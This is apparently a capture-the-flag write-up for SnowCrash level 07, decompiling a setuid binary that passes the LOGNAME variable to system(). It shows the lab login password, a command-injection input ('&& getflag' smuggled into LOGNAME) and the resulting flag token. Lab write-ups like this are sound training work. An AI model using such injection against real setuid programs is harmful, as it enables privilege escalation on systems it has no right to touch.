| .. | ||
| flag | ||
| passwd | ||
| README.md | ||
Level 07
how to login
username: level07
password: wiok45aaoguiboiki2tuin6ub
Goal
run getflag as user flag07
Actually doing something
level07@SnowCrash:~$ ll
total 24
dr-x------ 1 level07 level07 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level07 level07 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level07 level07 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x 1 flag07 level07 8805 Mar 5 2016 level07*
-r-x------ 1 level07 level07 675 Apr 3 2012 .profile*
seems like reverse engineering to me
level07@SnowCrash:~$ ./level07
level07
seems to be fun at parties indeed
lets crack open ghidra
int main(int argc,char **argv,char **envp)
{
char *pcVar1;
int iVar2;
char *buffer;
gid_t gid;
uid_t uid;
char *local_1c;
__gid_t local_18;
__uid_t local_14;
local_18 = getegid();
local_14 = geteuid();
setresgid(local_18,local_18,local_18);
setresuid(local_14,local_14,local_14);
local_1c = (char *)0x0;
pcVar1 = getenv("LOGNAME");
asprintf(&local_1c,"/bin/echo %s ",pcVar1);
iVar2 = system(local_1c);
return iVar2;
}
we have the classic setuid dance at the begining of the function, then a call to getenv+asprintf+system
I see a system so I know we are on track !
but lets go in order and clean up the code a bit
int main(int argc,char **argv,char **envp)
{
char *env;
int ret;
char *str;
str = NULL;
env = getenv("LOGNAME");
asprintf(&str,"/bin/echo %s ",env);
ret = system(str);
return ret;
}
already way better
It looks like it does something like this:
- Get the Varaible
LOGNAME - Create a string that looks like
/bin/echo $LOGNAMEusing asprintf asprintf is a way to create an allocated string with the format a regular printf would output - call system to execute the created string
To me this reeks of simple && getflag, lets try it out !
level07@SnowCrash:~$ LOGNAME="&& getflag" ./level07
Check flag.Here is your token : fiumuikeil55xe9cu4dood66h